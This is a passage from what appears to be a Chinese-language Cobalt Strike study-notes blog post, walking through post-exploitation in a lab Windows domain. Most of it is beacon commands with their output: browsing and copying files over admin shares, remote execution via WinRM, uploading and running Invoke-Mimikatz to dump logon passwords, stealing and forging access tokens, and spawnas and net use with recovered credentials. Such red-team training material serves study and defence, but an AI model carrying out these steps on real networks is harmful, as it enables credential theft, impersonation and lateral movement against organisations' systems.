</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br></div></div><h2 id="_3、无需恶意软件">3、无需恶意软件 <a href="#_3、无需恶意软件" class="header-anchor">#</a></h2> <p>如果一个系统信任我们为本地管理员权限，那么我们可以在那个系统上干什么呢？</p> <p><strong>查看共享文件</strong></p> <p>比如我们可以通过运行下面的命令来列出 C:\foo 的共享文件</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell <span class="token function">dir</span> \\host\C$\foo
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell <span class="token function">dir</span> \\WinDC\C$
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">dir</span> \\WinDC\C$
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 55 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
 驱动器 \\WinDC\C$ 中的卷没有标签。
 卷的序列号是 F269<span class="token operator">-</span>89A7
 \\WinDC\C$ 的目录
2020<span class="token operator">/</span>06<span class="token operator">/</span>24  09:29    &lt;<span class="token function">DIR</span>&gt;          inetpub
2009<span class="token operator">/</span>07<span class="token operator">/</span>14  11:20    &lt;<span class="token function">DIR</span>&gt;          PerfLogs
2020<span class="token operator">/</span>07<span class="token operator">/</span>16  21:24    &lt;<span class="token function">DIR</span>&gt;          Program Files
2020<span class="token operator">/</span>07<span class="token operator">/</span>16  21:52    &lt;<span class="token function">DIR</span>&gt;          Program Files <span class="token punctuation">(</span>x86<span class="token punctuation">)</span>
2020<span class="token operator">/</span>07<span class="token operator">/</span>17  23:00    &lt;<span class="token function">DIR</span>&gt;          Users
2020<span class="token operator">/</span>07<span class="token operator">/</span>26  00:55    &lt;<span class="token function">DIR</span>&gt;          Windows
               0 个文件              0 字节
               6 个目录 28<span class="token punctuation">,</span>500<span class="token punctuation">,</span>393<span class="token punctuation">,</span>984 可用字节
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br></div></div><p><strong>复制文件</strong></p> <p>比如运行下面的命令将 <code>secrets.txt</code>文件复制到当前目录。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell <span class="token function">copy</span> \\host\C$\foo\secrets<span class="token punctuation">.</span>txt
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell <span class="token function">copy</span> \\WinDC\C$\foo\secrets<span class="token punctuation">.</span>txt
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">copy</span> \\WinDC\C$\foo\secrets<span class="token punctuation">.</span>txt
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 93 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
已复制         1 个文件。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>查看文件列表</strong></p> <p>比如运行下面的命令。其中 /S 表示列出指定目录及子目录所有文件，/B 表示使用空格式，即没有标题或摘要信息。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>shell <span class="token function">dir</span> <span class="token operator">/</span>S <span class="token operator">/</span>B \\host\C$
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell <span class="token function">dir</span> <span class="token operator">/</span>S <span class="token operator">/</span>B \\WinDC\C$\Users
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">dir</span> <span class="token operator">/</span>S <span class="token operator">/</span>B \\WinDC\C$\Users
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 67 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
\\WinDC\C$\Users\administrator
\\WinDC\C$\Users\Classic <span class="token punctuation">.</span>NET AppPool
\\WinDC\C$\Users\Daniel
\\WinDC\C$\Users\Public
\\WinDC\C$\Users\administrator\Contacts
\\WinDC\C$\Users\administrator\Desktop
\\WinDC\C$\Users\administrator\Documents
\\WinDC\C$\Users\administrator\Downloads
\\WinDC\C$\Users\administrator\Favorites
……内容过多，余下部分省略……
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br></div></div><p><strong>使用 WinRM 运行命令</strong></p> <p>WinRM 运行在 5985 端口上，WinRM 是 Windows 远程管服务，使用 WinRM 可以使远程管理更容易一些。</p> <p>如果想利用 WinRM 运行命令则可以使用下面的命令。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>powershell <span class="token function">Invoke-Command</span> <span class="token operator">-</span>ComputerName TARGET <span class="token operator">-</span>ScriptBlock <span class="token punctuation">{</span>command here<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; powershell <span class="token function">Invoke-Command</span> <span class="token operator">-</span>ComputerName WinDC <span class="token operator">-</span>ScriptBlock <span class="token punctuation">{</span> net localgroup administrators<span class="token punctuation">}</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">Invoke-Command</span> <span class="token operator">-</span>ComputerName WinDC <span class="token operator">-</span>ScriptBlock <span class="token punctuation">{</span> net localgroup administrators<span class="token punctuation">}</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 303 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
别名     administrators
注释     管理员对计算机<span class="token operator">/</span>域有不受限制的完全访问权
成员
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
Administrator
Domain Admins
Daniel
Enterprise Admins
命令成功完成。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br></div></div><p>注：如果命令运行失败可能是因为 WinRM 配置原因，可在 powershell 环境下运行 <code>winrm quickconfig</code>命令，输入 <code>y</code> 回车即可。</p> <p>命令运行后的结果，WinRM 也将通过命令行进行显示，因此可以使用 Powershell 的 Invoke 命令来作为远程工具，而不使用其他的恶意软件来控制系统。</p> <p><strong>通过 WinRM 运行 Mimikatz</strong></p> <p>更进一步，甚至可以使用 PowerSploit 来通过 WinRM 运行 Mimikatz，只需要先导入 Invoke-Mimikatz.ps1 文件，再执行以下命令即可。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>powershell<span class="token operator">-</span>import <span class="token operator">/</span>path<span class="token operator">/</span>to<span class="token operator">/</span><span class="token function">Invoke-Mimikatz</span><span class="token punctuation">.</span>ps1
powershell <span class="token function">Invoke-Mimikatz</span> <span class="token operator">-</span>ComputerName TARGET
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><blockquote><p>注：之前提了很多次的 PowerView 也是 PowerSploit 项目里众多 ps1 文件之一，Mimikatz 的 ps1 文件在 PowerSploit 项目的 Exfiltration 目录下，PowerSploit 项目下载地址：<a href="https://github.com/PowerShellMafia/PowerSploit/" target="_blank" rel="noopener noreferrer">https://github.com/PowerShellMafia/PowerSploit/<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p></blockquote> <p>因为 beacon 上传文件大小限制在1MB，而 Invoke-Mimikatz.ps1 文件大小在 2 MB 多，因此直接运行 <code>powershell-import</code> 导入该文件会报错，这里可以选择使用 beacon 中的 upload 命令或者在当前会话的 File Browser 图形界面中上传该文件。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>upload C:\path\<span class="token function">Invoke-Mimikatz</span><span class="token punctuation">.</span>ps1
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>上传之后通过 dir 命令可以查看到文件被上传到了C盘下，之后可以运行以下命令来导入该文件。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>powershell <span class="token function">import-module</span> C:\<span class="token function">Invoke-Mimikatz</span><span class="token punctuation">.</span>ps1
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>最后再运行以下命令就能通过 WinRM 执行 Mimikatz 了。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>powershell <span class="token function">Invoke-Mimikatz</span> <span class="token operator">-</span>ComputerName TARGET
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>如果提示<code>无法将“Invoke-Mimikatz”项识别为 cmdlet、函数……</code>，则可以将两条命令以分号合并在一起运行，即：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>powershell import-module C:\Invoke-Mimikatz.ps1 ; Invoke-Mimikatz -ComputerName TARGET
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; powershell <span class="token function">import-module</span> C:\<span class="token function">Invoke-Mimikatz</span><span class="token punctuation">.</span>ps1 <span class="token punctuation">;</span> <span class="token function">Invoke-Mimikatz</span> <span class="token operator">-</span>ComputerName WinDC
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">import-module</span> C:\<span class="token function">Invoke-Mimikatz</span><span class="token punctuation">.</span>ps1 <span class="token punctuation">;</span> <span class="token function">Invoke-Mimikatz</span> <span class="token operator">-</span>ComputerName WinDC
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 287 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:

  <span class="token punctuation">.</span><span class="token comment">#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14</span>
 <span class="token punctuation">.</span><span class="token comment">## ^ ##.  &quot;A La Vie, A L'Amour&quot;</span>
 <span class="token comment">## / \ ##  /* * *</span>
 <span class="token comment">## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )</span>
 <span class="token string">'## v ##'</span>   http:<span class="token operator">/</span><span class="token operator">/</span>blog<span class="token punctuation">.</span>gentilkiwi<span class="token punctuation">.</span>com<span class="token operator">/</span>mimikatz             <span class="token punctuation">(</span>oe<span class="token punctuation">.</span>eo<span class="token punctuation">)</span>
  <span class="token string">'#####'</span>                                     with 20 modules <span class="token operator">*</span> <span class="token operator">*</span> <span class="token operator">*</span><span class="token operator">/</span>

mimikatz<span class="token punctuation">(</span>powershell<span class="token punctuation">)</span> <span class="token comment"># sekurlsa::logonpasswords</span>

Authentication Id : 0 <span class="token punctuation">;</span> 314628 <span class="token punctuation">(</span>00000000:0004cd04<span class="token punctuation">)</span>
Session           : Interactive <span class="token keyword">from</span> 1
User Name         : administrator
Domain            : TEAMSSIX
Logon Server      : WinDC
Logon Time        : 2020<span class="token operator">/</span>8<span class="token operator">/</span>20 23:53:08
SID               : S<span class="token operator">-</span>1<span class="token operator">-</span>5<span class="token operator">-</span>22<span class="token operator">-</span>3301978333<span class="token operator">-</span>983314215<span class="token operator">-</span>684642015<span class="token operator">-</span>500
	msv :	
	 <span class="token punctuation">[</span>00000003<span class="token punctuation">]</span> Primary
	 <span class="token operator">*</span> Username : Administrator
……内容过多，余下部分省略……
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br></div></div><p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs16-1.png" alt=""></p> <p>终于把碰到的坑都填完了，睡觉……</p> <h2 id="_4、获取信任">4、获取信任 <a href="#_4、获取信任" class="header-anchor">#</a></h2> <p>如果当前账号权限被系统认为是本地管理员权限，那么就可以执行很多管理员才能做的事，接下来就来看一下这样的一个过程是如何工作的，其中会涉及到以下要点：</p> <p>1、<code>Access Token</code> 登录令牌</p> <p>2、<code>Credentials</code> 凭证</p> <p>3、<code>Password Hashes</code> 密码哈希</p> <p>4、<code>Kerberos Tickets</code> 登录凭据</p> <h3 id="登录令牌">登录令牌 <a href="#登录令牌" class="header-anchor">#</a></h3> <ul><li>登录令牌在登录之后被创建</li> <li>与每个进程和线程相关联</li> <li>包括：
<ul><li>用户和用户组的信息</li> <li>本地计算机上的特权列表</li> <li>限制（删除用户和用户组的权限）</li> <li>参考凭证（支持单点登录）</li></ul></li> <li>一直保存在内存中，直到系统重启</li></ul> <p><em>以下是令牌窃取的过程：</em></p> <ul><li>使用 <code>ps</code> 列出进程</li> <li>使用 <code>steal_token [pid]</code> 窃取令牌</li> <li>使用 <code>getuid</code> 找到你是谁</li> <li>使用 <code>rev2self</code> 移除令牌</li></ul> <p>接下来将对这些命令进行演示，目前有一个 SYSTEM 权限的会话，该会话在 WIN-72A8ERDSF2P 主机下，此时想查看 WIN-P2AASSD1AF1 主机下的文件（WIN-P2AASSD1AF1 主机是 TEAMSSIX 域的域控制器），那么直接运行 dir 会提示拒绝访问。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell <span class="token function">dir</span> \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">dir</span> \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 55 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
拒绝访问。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>此时，先用 <code>ps</code> 查看一下当前系统进程信息。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; <span class="token function">ps</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to list processes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 12 bytes
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> <span class="token keyword">Process</span> List
 PID   PPID  Name                         Arch  Session     User
 <span class="token operator">--</span><span class="token operator">-</span>   <span class="token operator">--</span>-<span class="token operator">-</span>  <span class="token operator">--</span>-<span class="token operator">-</span>                         <span class="token operator">--</span>-<span class="token operator">-</span>  <span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>     <span class="token operator">--</span>-<span class="token operator">--</span>
 0     0     <span class="token namespace">[System Process]</span>                               
 4     0     System                       x64   0           NT AUTHORITY\SYSTEM
……内容太多，此处省略……
 3720  524   taskhost<span class="token punctuation">.</span>exe                 x64   2           WIN<span class="token operator">-</span>72A8ERDSF2P\Administrator
 4092  236   dwm<span class="token punctuation">.</span>exe                      x64   3           TEAMSSIX\Administrator
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br></div></div><p>通过进程信息可以发现 TEAMSSIX 域下的管理员账户此时在当前 SYSTEM 会话的主机上是登录着的，使用 <code>steal_token [pid]</code> 命令窃取 TEAMSSIX\Administrator 账户的令牌</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; steal_token 4092
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to steal token <span class="token keyword">from</span> PID 4092
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 12 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> Impersonated TEAMSSIX\administrator
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>查看一下当前会话 uid</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; getuid
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to get userid
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 8 bytes
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> You are TEAMSSIX\administrator <span class="token punctuation">(</span>admin<span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>再次尝试获取域控制器主机下的文件</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; shell <span class="token function">dir</span> \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">dir</span> \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 55 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
 驱动器 \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$ 中的卷没有标签。
 卷的序列号是 F269<span class="token operator">-</span>89A7
 \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$ 的目录
2020<span class="token operator">/</span>07<span class="token operator">/</span>16  21:24    &lt;<span class="token function">DIR</span>&gt;          Program Files
2020<span class="token operator">/</span>07<span class="token operator">/</span>16  21:52    &lt;<span class="token function">DIR</span>&gt;          Program Files <span class="token punctuation">(</span>x86<span class="token punctuation">)</span>
2020<span class="token operator">/</span>07<span class="token operator">/</span>17  23:00    &lt;<span class="token function">DIR</span>&gt;          Users
2020<span class="token operator">/</span>07<span class="token operator">/</span>26  00:55    &lt;<span class="token function">DIR</span>&gt;          Windows
               0 个文件      0 字节
               4 个目录 28<span class="token punctuation">,</span>493<span class="token punctuation">,</span>299<span class="token punctuation">,</span>712 可用字节
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br></div></div><p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs17-1.png" alt=""></p> <p>发现可以成功访问了，使用  <code>rev2self</code> 可移除当前窃取的令牌</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; rev2self
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to revert token
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 8 bytes
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>再次查看 uid 发现变成了原来的 SYSTEM 权限，此时 WIN-P2AASSD1AF1 主机上的文件也拒绝访问了。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; getuid
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to get userid
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 8 bytes
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> You are NT AUTHORITY\SYSTEM <span class="token punctuation">(</span>admin<span class="token punctuation">)</span>

beacon&gt; shell <span class="token function">dir</span> \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">dir</span> \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 55 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
拒绝访问。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><h3 id="凭证">凭证 <a href="#凭证" class="header-anchor">#</a></h3> <p>1、使用 make_token 创建一个令牌</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>make_token DOMAIN\user password
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>在运行命令之前，需要知道要获取令牌用户的密码，这里可以使用 mimikatz 进行获取，具体的方法可参考<a href="https://teamssix.com/year/200419-150600.html" target="_blank" rel="noopener noreferrer">《CS学习笔记 | 14、powerup提权的方法》<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>这一节中的介绍。</p> <p>这里还是和上文一样的环境，在一个 SYSTEM 会话下，获取 TEAMSSIX\administrator 账号令牌，使用 mimikatz 可以得知 TEAMSSIX\administrator 账号密码为 Test111!，接下来使用 <code>make_token</code> 命令。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; make_token TEAMSSIX\administrator Test111<span class="token operator">!</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to create a token <span class="token keyword">for</span> TEAMSSIX\administrator
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 53 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> Impersonated NT AUTHORITY\SYSTEM

beacon&gt; shell <span class="token function">dir</span> \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">dir</span> \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 55 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
 驱动器 \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$ 中的卷没有标签。
 卷的序列号是 F269<span class="token operator">-</span>89A7
 \\WIN<span class="token operator">-</span>P2AASSD1AF1\C$ 的目录
2020<span class="token operator">/</span>07<span class="token operator">/</span>16  21:24    &lt;<span class="token function">DIR</span>&gt;          Program Files
2020<span class="token operator">/</span>07<span class="token operator">/</span>16  21:52    &lt;<span class="token function">DIR</span>&gt;          Program Files <span class="token punctuation">(</span>x86<span class="token punctuation">)</span>
2020<span class="token operator">/</span>07<span class="token operator">/</span>17  23:00    &lt;<span class="token function">DIR</span>&gt;          Users
2020<span class="token operator">/</span>07<span class="token operator">/</span>26  00:55    &lt;<span class="token function">DIR</span>&gt;          Windows
               0 个文件      0 字节
               4 个目录 28<span class="token punctuation">,</span>493<span class="token punctuation">,</span>299<span class="token punctuation">,</span>712 可用字节
               
beacon&gt; powershell <span class="token function">Invoke-Command</span> <span class="token operator">-</span>computer WIN<span class="token operator">-</span>P2AASSD1AF1 <span class="token operator">-</span>ScriptBlock <span class="token punctuation">{</span>whoami<span class="token punctuation">}</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run: <span class="token function">Invoke-Command</span> <span class="token operator">-</span>computer WIN<span class="token operator">-</span>P2AASSD1AF1 <span class="token operator">-</span>ScriptBlock <span class="token punctuation">{</span>whoami<span class="token punctuation">}</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 231 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
teamssix\administrator
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br></div></div><p>当密码输入错误时，执行上面的两个命令就会提示 <code>登录失败: 未知的用户名或错误密码。</code> 同样的使用 <code>rev2self</code> 可除去当前令牌，恢复原来的 SYSTEM 权限。</p> <p>2、使用 spawn beacon 替代凭证</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>spawnas DOMAIN\user password
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>3、在目标上建立账户</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>net use \\host\C$<span class="token operator">/</span>USER:DOMAIN\user password
